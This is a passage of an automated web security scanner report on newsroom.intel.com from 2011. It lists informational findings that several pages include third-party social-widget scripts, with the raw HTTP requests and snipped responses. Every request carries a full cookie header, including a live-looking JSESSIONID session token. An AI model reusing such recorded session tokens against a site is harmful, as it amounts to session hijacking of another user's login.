Host:   http://newsroom.intel.com
Path:   /ann-delete.jspa

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /ann-delete.jspa HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 05 Feb 2011 23:15:43 GMT
Server: Apache
X-JAL: 14
Content-Language: en-US
CacheHit: D=22418 t=1296947743508369
X-JSL: D=22423 t=1296947743508369
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.52. http://newsroom.intel.com/ann-expire.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /ann-expire.jspa

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /ann-expire.jspa HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 05 Feb 2011 23:15:39 GMT
Server: Apache
X-JAL: 15
Content-Language: en-US
CacheHit: D=24033 t=1296947739414926
X-JSL: D=24038 t=1296947739414926
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.53. http://newsroom.intel.com/archive.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /archive.jspa

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /archive.jspa HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:05 GMT
Server: Apache
X-JAL: 124
Content-Language: en-US
CacheHit: D=131942 t=1296947705643632
X-JSL: D=131947 t=1296947705643632
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.54. http://newsroom.intel.com/community/de_de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/de_de

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://twitter.com/javascripts/blogger.js
  • http://twitter.com/statuses/user_timeline/104827309.json?callback=twitterCallback2&count=5
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/de_de HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:32 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313935393b33382c313538363b33382c313931393b33382c313934363b33382c313936333b31342c323030343b31342c323032353b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:34 GMT; Path=/
X-JAL: 157
Content-Language: en-US
CacheHit: D=185783 t=1296947672341771
X-JSL: D=185788 t=1296947672341771
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</div><script src="http://twitter.com/javascripts/blogger.js" type="text/javascript"></script><script src="http://twitter.com/statuses/user_timeline/104827309.json?callback=twitterCallback2&amp;count=5" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.55. http://newsroom.intel.com/community/en_eu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/en_eu/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://twitter.com/javascripts/blogger.js
  • http://twitter.com/statuses/user_timeline/intelnews.json?callback=twitterCallback2&count=5
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/en_eu/ HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:35 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313931393b33382c313538363b33382c313936303b33382c313935393b33382c313934363b33382c313936333b31342c323031303b31342c323031313b31342c323032353b31342c323031363b31342c323030343b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:38 GMT; Path=/
X-JAL: 552
Content-Language: en-US
CacheHit: D=562460 t=1296947675935267
X-JSL: D=562466 t=1296947675935267
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</div><script src="http://twitter.com/javascripts/blogger.js" type="text/javascript"></script><script src="http://twitter.com/statuses/user_timeline/intelnews.json?callback=twitterCallback2&amp;count=5" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.56. http://newsroom.intel.com/community/en_ie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/en_ie

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://twitter.com/javascripts/blogger.js
  • http://twitter.com/statuses/user_timeline/Intel_IRL.json?callback=twitterCallback2&count=5
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/en_ie HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:35 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313936303b33382c313931393b33382c313935393b33382c313934363b33382c313936333b31342c323030353b31342c323032353b31342c323031363b31342c323030343b31342c323031303b; Expires=Mon, 07-Mar-2011 23:14:37 GMT; Path=/
X-JAL: 170
Content-Language: en-US
CacheHit: D=180106 t=1296947675858488
X-JSL: D=180112 t=1296947675858488
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...
</div><script src="http://twitter.com/javascripts/blogger.js" type="text/javascript"></script><script src="http://twitter.com/statuses/user_timeline/Intel_IRL.json?callback=twitterCallback2&amp;count=5" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.57. http://newsroom.intel.com/community/en_uk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/en_uk

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://twitter.com/javascripts/blogger.js
  • http://twitter.com/statuses/user_timeline/inteluk.json?callback=twitterCallback2&count=5
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/en_uk HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:37 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313931393b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323030373b31342c323030363b31342c323031363b31342c323031313b31342c323031303b31342c323032353b31342c323030343b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:39 GMT; Path=/
X-JAL: 245
Content-Language: en-US
CacheHit: D=263295 t=1296947677873574
X-JSL: D=263300 t=1296947677873574
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</div><script src="http://twitter.com/javascripts/blogger.js" type="text/javascript"></script><script src="http://twitter.com/statuses/user_timeline/inteluk.json?callback=twitterCallback2&amp;count=5" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.58. http://newsroom.intel.com/community/en_za/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/en_za/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/en_za/ HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; 